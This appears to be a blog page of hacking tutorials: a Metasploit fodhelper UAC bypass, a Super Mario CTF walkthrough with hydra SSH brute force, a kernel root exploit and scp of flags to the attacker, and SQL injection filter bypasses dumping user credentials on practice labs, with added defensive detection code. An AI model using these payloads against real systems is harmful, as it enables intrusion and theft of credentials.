Showing posts with label Kali Linux. Show all posts

Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

Hello friends! Today we are going to share a new article on how to bypass Windows 10 UAC once you have compromised the victim's system. A new module has been added to Metasploit to achieve admin access on Windows 10.
Attacker: Kali Linux

Target: Windows 10


This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
msf exploit(bypassuac_fodhelper) > exploit

Hence you can see another meterpreter session, session 2, has opened, which means we have successfully exploited the target once again; now let's check the user privilege.
meterpreter > getsystem

Awesome!!!! We got admin privilege successfully.
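Seen from the defender's side, the registry write this module performs is the thing to alert on. Here is an added Python example, not part of the original post or of the Metasploit module, that checks a feed of Sysmon-style registry and process events for the ms-settings command key being written under a user hive and for fodhelper.exe starting afterwards; the event format, SID, file paths and image names are constructed for the demo.

```python
import re

# Added detector for the registry hijack performed by bypassuac_fodhelper.
# Input: simplified Sysmon events as "EventID|Image|TargetObject" strings
# (constructed for this demo, not real Sysmon output). Event 13 = value set,
# 12 = key created/deleted, 1 = process created. Because the module deletes
# the key once the payload has run, a point-in-time registry scan can miss
# it; an event stream records the write before the cleanup.

# The fodhelper bypass writes the ms-settings\shell\open\command key under
# the current user's hive (HKU\<SID>\Software\Classes\...).
FODHELPER_KEY = re.compile(
    r'\\Software\\Classes\\ms-settings\\shell\\open\\command', re.I)
FODHELPER_EXE = re.compile(r'\\fodhelper\.exe$', re.I)

SID = 'S-1-5-21-1111-2222-3333-1001'                      # constructed SID
STAGER = r'C:\Users\user\AppData\Local\Temp\stage.exe'     # constructed path

SAMPLE_EVENTS = [
    "13|C:\\Windows\\explorer.exe|HKU\\%s\\Software\\Classes\\.txt\\OpenWithProgids\\txtfile" % SID,
    "13|%s|HKU\\%s\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" % (STAGER, SID),
    "13|%s|HKU\\%s\\Software\\Classes\\ms-settings\\shell\\open\\command\\(Default)" % (STAGER, SID),
    "1|C:\\Windows\\System32\\fodhelper.exe|",
    "12|%s|HKU\\%s\\Software\\Classes\\ms-settings\\shell\\open\\command" % (STAGER, SID),
]


def parse_event(line):
    event_id, image, target = line.split('|', 2)
    return {'id': int(event_id), 'image': image, 'target': target}


def registry_hijacks(lines):
    """Return (image, target) for every write or delete of the hijack key."""
    hits = []
    for ev in map(parse_event, lines):
        if ev['id'] in (12, 13) and FODHELPER_KEY.search(ev['target']):
            hits.append((ev['image'], ev['target']))
    return hits


def hijack_then_fodhelper(lines):
    """True when fodhelper.exe starts after the key was written, which is
    the launch that runs the planted command."""
    key_written = False
    for ev in map(parse_event, lines):
        if ev['id'] == 13 and FODHELPER_KEY.search(ev['target']):
            key_written = True
        elif ev['id'] == 1 and key_written and FODHELPER_EXE.search(ev['image']):
            return True
    return False
```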

Hack the Super Mario (CTF Challenge)

Hello friends!! You may have played THE SUPER MARIO game in your childhood, and no wonder if the thought of hacking the game has struck your mind. Whatever you thought, today we are going to make it come true, and for that you need to download the new Super Mario VM from here.

The credit for developing this VM goes to Mr_h4sh, who has hidden 2 flags inside this lab as a challenge for hackers. The level of the challenge is intermediate.
Let's breach!!!

As you know, we always start with enumeration, so open the terminal in your Kali Linux and go for an aggressive scan with nmap.

nmap -p- -A 192.168.0.5


Since port 22 and port 8180 are open for the services SSH and HTTP respectively, I chose port 8180 for enumeration, but from the screenshot you can see I didn't get any remarkable result.
dirb http://192.168.0.5:8180


Then I moved on to a directory brute-force attack using the following command
dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt
In the screenshot below you can see it found a file named vhosts; let's explore it through the browser.


Now open http://192.168.0.5:8180/vhosts in the browser. Here vhosts stands for virtual hosts, a method for hosting multiple domains on a single server. From inside vhosts I came to know that the server name is mario.supermariohost.local.


Let's add mario.supermariohost.local to /etc/hosts as a new local host entry
cd /etc
vim hosts


Now type "192.168.0.5 mario.supermariohost.local" inside the vim editor to add it to /etc/hosts, then type :wq to save it.


Now type cat hosts to check the added host name; from the screenshot you can see it has been added successfully.

Then I visited mario.supermariohost.local in the browser and finally got Mario as a browser game, but it is not working.


Since we know ports 22 and 8180 were open and we didn't get much information from enumerating port 8180, we will now move towards port 22 for SSH enumeration. For this I prepared a dictionary in order to retrieve credentials to log in to the SSH server.
The dictionary contains usernames that are famous characters of MARIO; you can check these names on Google as well.
Inside a text editor type the following names: Mario; luigi; peach; toad; yoshi and save the file as user on the desktop.


Use John the Ripper to generate a password dictionary with the following command: --rules applies john's word-mangling rules to each word of the wordlist, and --stdout writes the generated candidates to standard output instead of cracking anything, so we redirect them into a file named pass on the desktop.
john --wordlist=user --rules --stdout > pass


Finally we have the username dictionary user and the password dictionary pass generated by john; now we have to find the matching combination of user and pass in order to retrieve credentials for SSH login. I chose hydra for password cracking; you can choose any other password-cracking tool as well.
hydra -L user -P pass 192.168.0.5 ssh
From the screenshot you can read the matched combination for the SSH server: username luigi and password luigi1.


Now log in over SSH as luigi with the following
Password: luigi1
Yeeppiii!!!! Finally we have logged in to the SSH server.


uname -a
Here we come to know that the kernel of supermariohost is Linux 3.13.0; let's check for its exploit on Google.


Yes, there is an exploit for the 3.13.0 overlayfs local root in Ubuntu; download it from here into your Kali Linux.


From the screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation.


Now type the following command to download Mario.c onto the target system.
The file is downloaded successfully; now type another command to compile Mario.c
gcc Mario.c -o mario


./mario
id
cd /root
ls
Awesome!!! We have got root privilege, and from the screenshot you can see that inside its directory I found a zip file, flag.zip


Now type the following command to download flag.zip to the desktop of your Kali Linux
scp /root/flag.zip root@192.168.0.6:/root/Desktop


fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip
As shown in the screenshot, PASSWORD FOUND!!!: pw == ilovepeach; now you can unzip the file using this password.
unzip flag.zip
It will ask for the password; give the above password to unzip it, and if you look at the image again you will notice it contains flag.txt
cat flag.txt
1st FLAG: Well done :D If you reached this it means you got root, congratulations.


Now follow the steps below in order to complete the other challenge.
iptables -L
Here from the screenshot you can see a new network has been added on the remote system.


arp -n
Now the target system has been forwarded to a new IP, 192.168.122.112


ls -la
Found a directory .bak


cd /.bak
ls
cd users
cd luigi
ls
There are two files inside it; let's read them one by one
cat message
Hi Luigi,
Since you've been messing around with my host, at this point I want to return the favour.
This is a "war", you "naughty" boy!


cat id_rsa.pub
The highlighted word in the given text may be a username for logging in to the SSH server.


Let's make sure by logging in with ssh -i id_rsa warluigi@192.168.122.112


Great!! Our assumption has given a positive result
Again check the kernel version
uname -a
Woooww!! It is the same version, so we can use our Mario.c exploit for root privilege. Hence repeat the above steps as shown in the images.


The file is downloaded successfully; now type another command to compile Mario.c
gcc Mario.c -o Mario
./Mario


id
cd /root
ls -la
Here I found two important files, hint.txt and flag2.zip; before unzipping flag2.zip we must look at the hint.txt file.
cat .hint.txt
"Peach Loves Me" might be the password key for decrypting the flag2.zip file
Now let's download flag2.zip to the desktop of Kali Linux using the following again
scp /root/flag2.zip root@192.168.0.6:/root/Desktop


unzip flag2.zip
Now when it asks for the password key, type "Peach Loves Me"
It contains flag2.txt; type cat flag2.txt to open this file.
2nd FLAG: Congratulations on your second flag!

Wonderful!!! We have caught both flags
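For the hydra step above, the trace it leaves on the SSH server is the part a defender cares about. The following Python is an added example, not from the original post, that looks through constructed auth.log lines for one client failing against several usernames and then being accepted; the log lines are constructed, with 192.168.0.6 standing in for the attacking Kali box.

```python
import re
from collections import defaultdict

# Added example, not from the original post: the hydra run above tries a
# short list of Mario character names against SSH, which shows up in the
# target's auth.log as a burst of failures for several different usernames
# from one client followed by an accepted login. The log lines below are
# constructed; 192.168.0.6 is the attacker address used in the walkthrough.

SAMPLE_AUTH_LOG = """\
Oct 10 10:00:01 supermariohost sshd[2001]: Failed password for invalid user mario from 192.168.0.6 port 51000 ssh2
Oct 10 10:00:01 supermariohost sshd[2002]: Failed password for luigi from 192.168.0.6 port 51001 ssh2
Oct 10 10:00:02 supermariohost sshd[2003]: Failed password for invalid user peach from 192.168.0.6 port 51002 ssh2
Oct 10 10:00:02 supermariohost sshd[2004]: Failed password for invalid user toad from 192.168.0.6 port 51003 ssh2
Oct 10 10:00:03 supermariohost sshd[2005]: Failed password for invalid user yoshi from 192.168.0.6 port 51004 ssh2
Oct 10 10:00:03 supermariohost sshd[2006]: Failed password for luigi from 192.168.0.6 port 51005 ssh2
Oct 10 10:00:04 supermariohost sshd[2007]: Accepted password for luigi from 192.168.0.6 port 51006 ssh2
Oct 10 10:05:00 supermariohost sshd[2010]: Failed password for luigi from 192.168.0.20 port 40000 ssh2
Oct 10 10:05:10 supermariohost sshd[2011]: Accepted password for luigi from 192.168.0.20 port 40001 ssh2
"""

AUTH_RE = re.compile(
    r'sshd\[\d+\]: (?P<outcome>Failed|Accepted) password for (?:invalid user )?'
    r'(?P<user>\S+) from (?P<ip>\S+) port \d+')


def dictionary_attacks(log_text, min_failures=5, min_users=3):
    """Per client: failures, distinct usernames tried, and which account was
    accepted after the failure run. Only clients that crossed both thresholds
    are returned, so a user mistyping one password does not trigger."""
    state = defaultdict(lambda: {'failures': 0, 'users': set(),
                                 'accepted_after': None})
    for line in log_text.splitlines():
        m = AUTH_RE.search(line)
        if not m:
            continue
        client = state[m.group('ip')]
        if m.group('outcome') == 'Failed':
            client['failures'] += 1
            client['users'].add(m.group('user'))
        elif client['failures'] >= min_failures:
            client['accepted_after'] = m.group('user')
    return {ip: c for ip, c in state.items()
            if c['failures'] >= min_failures and len(c['users']) >= min_users}
```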

How to Bypass Filter in SQL Injection Manually

In the previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that your basic knowledge and tricks fail. The reason is the protection the developer has applied to prevent SQL injection: sometimes developers use filters to strip out certain characters and OPERATORS from the user input before adding it to the SQL statement. Today's article will help you face such situations and show you how to bypass such filters. Here again we'll be using the DHAKKAN SQLI labs for practice.

Let’s start!!

LESSON 25
In Lab 25 the OR and AND operators are blocked; here we will try to bypass the SQL filter using their substitutes.

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);    // strip out OR (case insensitive)
    $id = preg_replace('/AND/i', "", $id);   // strip out AND (case insensitive)
    return $id;
}

Since the alphabetic words OR and AND are blacklisted, if we use AND 1=1 or OR 1=1 there will be no output; therefore I used %26%26 inside the query. The following are replacements for AND and OR (note that & must be URL-encoded as %26, because a raw & in the URL is read as the separator between query-string parameters and would never reach the filter as part of id):
AND : && (%26%26 in the URL)
OR : ||

Open the browser and type the following SQL query in the URL
http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+

From the screenshot you can see the query works with && (URL-encoded as %26%26) in place of AND, even though the AND operator was filtered out.


Once the concept of bypassing the AND filter is clear, we need to alter the SQL statement to retrieve database information.
http://localhost:81/sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+


Type the following query to retrieve the database name using union injection

http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+

Hence you can see we have successfully got security as the database name.


The next query will return all the table names saved inside the database.
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %26%26 1=1 --+
From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users


Now we'll try to find out the column names of the users table using the following query.
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %26%26 1=1 --+
Hence you can see the columns inside it:
C1: id
C2: username
C3: password


Finally, execute the following query to read all the usernames inside the table users from its username column.
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+
From the screenshot you can read the fetched data.

Hence in lesson 25 we have learned how to bypass the AND and OR filters to retrieve information from the database.



LESSON 26
You will find lab 26 more challenging because here space, comments, OR and AND are blocked, so now we will try to bypass the SQL filter using their substitutes.

The function blacklist($id) is as follows
function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);        // strip out OR (case insensitive)
    $id = preg_replace('/and/i', "", $id);       // strip out AND (case insensitive)
    $id = preg_replace('/[\/\*]/', "", $id);     // strip out /*
    $id = preg_replace('/[--]/', "", $id);       // strip out --
    $id = preg_replace('/[#]/', "", $id);        // strip out #
    $id = preg_replace('/[\s]/', "", $id);       // strip out spaces
    $id = preg_replace('/[\/\\\\]/', "", $id);   // strip out slashes
    return $id;
}

This lab has more filters compared to lab 25, because here space and comments are also blocked. Now execute the following query in the URL.


From the screenshot you can see we fixed the query for SPACE by URL-encoding it as %a0: the filter's [\s] does not match the 0xA0 byte, so it reaches the query untouched, and the lab's MySQL accepts it as a separator. Other blank characters commonly substituted for a space are
Blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%a0')


Once the concept of bypassing the AND, OR and SPACE filters is clear, we need to alter the SQL statement to retrieve database information.
http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1


Type the following query to retrieve the database name using union injection.

Hence you can see we have successfully got security as the database name


The next query will return all the table names saved inside the database.
From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users


Now we'll try to find out the column names of the users table using the following query.

Hence you can see the columns inside it:
C1: id
C2: username
C3: password


Finally, execute the following query to read all the usernames inside the table users from its username column.
From the screenshot you can read the fetched data.

Hence in lesson 26 we have learned how to bypass the AND, OR, SPACE and COMMENT filters to retrieve information from the database.


LESSON 27
You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and comments are blocked, so now we will try to bypass the SQL filter using their substitutes.

The function blacklist($id) is as follows
function blacklist($id)
{
    $id = preg_replace('/[\/\*]/', "", $id);    // strip out /*
    $id = preg_replace('/[--]/', "", $id);      // strip out --
    $id = preg_replace('/[#]/', "", $id);       // strip out #
    $id = preg_replace('/[ +]/', "", $id);      // strip out spaces and +
    $id = preg_replace('/select/m', "", $id);   // strip out select
    $id = preg_replace('/[ +]/', "", $id);      // strip out spaces and +
    $id = preg_replace('/union/s', "", $id);    // strip out union
    $id = preg_replace('/select/s', "", $id);   // strip out select
    $id = preg_replace('/UNION/s', "", $id);    // strip out UNION
    $id = preg_replace('/SELECT/s', "", $id);   // strip out SELECT
    $id = preg_replace('/Union/s', "", $id);    // strip out Union
    $id = preg_replace('/Select/s', "", $id);   // strip out Select
    return $id;
}

This lab has more filters in addition to lab 26, because here union, select, space and comments are also blocked. Note that, unlike lessons 25 and 26, these keyword patterns carry no /i modifier, so each one only matches that exact spelling. Now execute the following query in the URL.
http://localhost:81/sqli/Less-27/?id=1' AND'1=1


Once the concept of bypassing the UNION/union, SELECT/select and SPACE filters is clear, we need to alter the SQL statement to retrieve database information.
In the screenshot you can see I used union as UnIon and select as SeLect in the query to bypass the filter.


Now type the following query to retrieve the database name using union injection.
Hence you can see we have successfully got security as the database name


The next query will return all the table names saved inside the database.
From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users


Now we'll try to find out the column names of the users table using the following query.

Hence you can see the columns inside it:
C1: id
C2: username
C3: password


Finally, execute the following query to read all the usernames inside the table users from its username column.
From the screenshot you can read the fetched data.


Hence in lesson 27 we have learned how to bypass the UNION/union, SELECT/select, SPACE and COMMENT filters to retrieve information from the database.
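To make the three blacklist() functions and their bypasses concrete, here is an added Python re-implementation (not the lab's PHP and not from the original post) that runs the lesson 25, 26 and 27 filters over the payloads shown above and contrasts them with a validated, parameterised lookup; the sqlite3 table and its rows are constructed for the demo.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Added example (not the lab's PHP, not from the original post): the three
# blacklist() functions re-implemented with re.sub in place of preg_replace,
# run against the payloads shown above, next to the validated, parameterised
# lookup the lab should have used. re.ASCII limits \s to ASCII whitespace, as
# PCRE does without the /u modifier, so the 0xA0 byte is not stripped.

def blacklist_less25(s):
    s = re.sub(r'or', '', s, flags=re.I)
    s = re.sub(r'and', '', s, flags=re.I)
    return s

def blacklist_less26(s):
    s = blacklist_less25(s)
    for pattern in (r'[/*]', r'[--]', r'[#]', r'[/\\]'):
        s = re.sub(pattern, '', s)
    return re.sub(r'[\s]', '', s, flags=re.ASCII)

def blacklist_less27(s):
    for pattern in (r'[/*]', r'[--]', r'[#]', r'[ +]'):
        s = re.sub(pattern, '', s)
    for keyword in ('select', 'union', 'SELECT', 'UNION', 'Select', 'Union'):
        s = s.replace(keyword, '')  # exact case, single pass, like /select/s
    return s

def after_filter(filter_fn, query_value):
    """Decode the value as the web server would, then apply the lab filter.

    URL encoding hides nothing from the filter: %26%26 arrives as '&&' and
    %a0 as the byte 0xA0; they survive only because no rule matches them.
    """
    return filter_fn(unquote_plus(query_value, encoding='latin-1'))

def demo_db():
    # Constructed in-memory stand-in for the lab's users table.
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, 'alice'), (2, 'bob')])
    return conn

def lookup_hardened(conn, raw_id):
    """Defensive replacement for a blacklist: validate the type, then bind.

    Returns the matching usernames, or None when the input is not an integer.
    """
    if not raw_id.strip().isdecimal():
        return None
    rows = conn.execute("SELECT username FROM users WHERE id = ?",
                        (int(raw_id),)).fetchall()
    return [row[0] for row in rows]
```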

Manual SQL Injection Exploitation Step by Step

This article builds on our previous article, where you learned different techniques to perform SQL injection manually using Dhakkan. Today we are again performing SQL injection manually, this time on the live practice website "vulnweb.com", to spare you the stress of installing the Dhakkan setup.

We are going to apply the same concepts and techniques as performed in Dhakkan on a different platform.
Let's begin!

Open the target URL given below in the browser

http://testphp.vulnweb.com/artist.php?artist=1
So here we are going to test SQL injection for the parameter artist=1



Now use the error-based technique by adding an apostrophe (') at the end of the input, which will try to break the query.

http://testphp.vulnweb.com/artist.php?artist=1'


In the screenshot you can see we got an error message, which means the running site is vulnerable to SQL injection.


Now use the ORDER BY keyword for artist=1: ORDER BY n sorts the records by the n-th column of the query, so it only succeeds while n is within the number of columns selected.


Similarly repeat for order by 2, 3 and so on, one by one


From the screenshot you can see we got an error at order by 4, which means the query selects only three columns.


Let's penetrate further using union-based injection to select statements from a different table.

From the screenshot you can see it shows the result for only one table, not for the others.


Now try to pass a wrong input into the database through the URL by replacing artist=1 with artist=-1 as given below:


Hence you can see now it is showing the result for the remaining two tables as well.


Use the next query to fetch the name of the database
From the screenshot you can read the database name acuart


The next query will extract the current username as well as the version of the database system
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,version(),current_user()
Here we have retrieved 5.1.73-0ubuntu0.10.04.1 as the version and acuart@localhost as the current user


Through the next query we will try to fetch the table names inside the database
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
From the screenshot you can see the name of the first table is carts.


Similarly repeat the same query for another table with a slight change
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1

We got table 2: categ


http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1

We got table 3: featured


Similarly repeat the same query for tables 4, 5, 6 and 7, making slight changes in LIMIT.
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1

We got table 7: users


http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1


Since we didn't get anything when LIMIT is set to 8,1, there are probably only 7 tables inside the database.


The group_concat function concatenates two or more strings into a single string, so all the table names can be read in one request.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

From the screenshot you can see that through the group_concat function we have successfully retrieved all the table names inside the database.
Table1: artist
Table2: Carts
Table3: Featured
Table4: Guestbook
Table5: Pictures
Table6: Product
Table7: users


Maybe we can get some important data from the users table, so let's penetrate further. Again use the group_concat function to retrieve the entire column list of the table users.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
Awesome!! We successfully retrieved all eight column names from inside the table users.
Then I chose only four columns, i.e. uname, pass, email and cc, for further enumeration.


Use group_concat to select uname from the table users by executing the following query through the URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(uname),3 from users

From the screenshot you can read uname: test


Use group_concat to select pass from the table users by executing the following query through the URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(pass),3 from users

From the screenshot you can read pass: test


Use group_concat to select cc (credit card) from the table users by executing the following query through the URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(cc),3 from users
From the screenshot you can read cc: 1234-5678-2300-9000


Use group_concat to select email from the table users by executing the following query through the URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(email),3 from users
From the screenshot you can read email: jitendra@panalinks.com
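On the receiving end, the whole sequence above (apostrophe, ORDER BY counting, UNION SELECT, information_schema) is visible in the web server's access log. The following Python is an added example, not from the original post, that scores constructed access-log lines for exactly those patterns and ranks clients; the log lines, timestamps and client addresses are constructed.

```python
import re
from urllib.parse import urlparse, parse_qs

# Added example, not from the original post: scoring web-server access-log
# lines for the probing sequence shown above (a stray apostrophe, ORDER BY
# column counting, then UNION SELECT against information_schema). The log
# lines, the timestamps and the client addresses are constructed.

SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2017:10:01:01 +0000] "GET /artist.php?artist=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2017:10:01:05 +0000] "GET /artist.php?artist=1' HTTP/1.1" 200 1800
203.0.113.7 - - [10/Oct/2017:10:01:09 +0000] "GET /artist.php?artist=1%20order%20by%203 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2017:10:01:12 +0000] "GET /artist.php?artist=1%20order%20by%204 HTTP/1.1" 200 1800
203.0.113.7 - - [10/Oct/2017:10:01:20 +0000] "GET /artist.php?artist=-1%20union%20select%201,version(),current_user() HTTP/1.1" 200 2100
203.0.113.7 - - [10/Oct/2017:10:01:25 +0000] "GET /artist.php?artist=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 2300
198.51.100.9 - - [10/Oct/2017:10:02:00 +0000] "GET /artist.php?artist=2 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')

# (name, weight, pattern) applied to each decoded query-string value.
RULES = [
    ('unbalanced quote',   1, re.compile(r"^[^']*'[^']*$")),
    ('order-by probing',   2, re.compile(r'\border\s+by\s+\d+', re.I)),
    ('union select',       3, re.compile(r'\bunion\s+select\b', re.I)),
    ('schema enumeration', 3, re.compile(r'information_schema', re.I)),
]

def score_line(line):
    """Return (client_ip, [(rule, weight), ...]) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlparse(m.group('url')).query, keep_blank_values=True)
    findings = [(name, weight)
                for values in params.values() for value in values
                for name, weight, rx in RULES if rx.search(value)]
    return m.group('ip'), findings

def suspicious_clients(log_text, threshold=4):
    """Sum rule weights per client. One stray quote (a typo, or a single
    manual test) stays under the threshold; the full sequence does not."""
    totals = {}
    for line in log_text.splitlines():
        parsed = score_line(line)
        if parsed is None:
            continue
        ip, findings = parsed
        totals[ip] = totals.get(ip, 0) + sum(w for _, w in findings)
    return {ip: total for ip, total in totals.items() if total >= threshold}
```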

 Enjoy hacking!!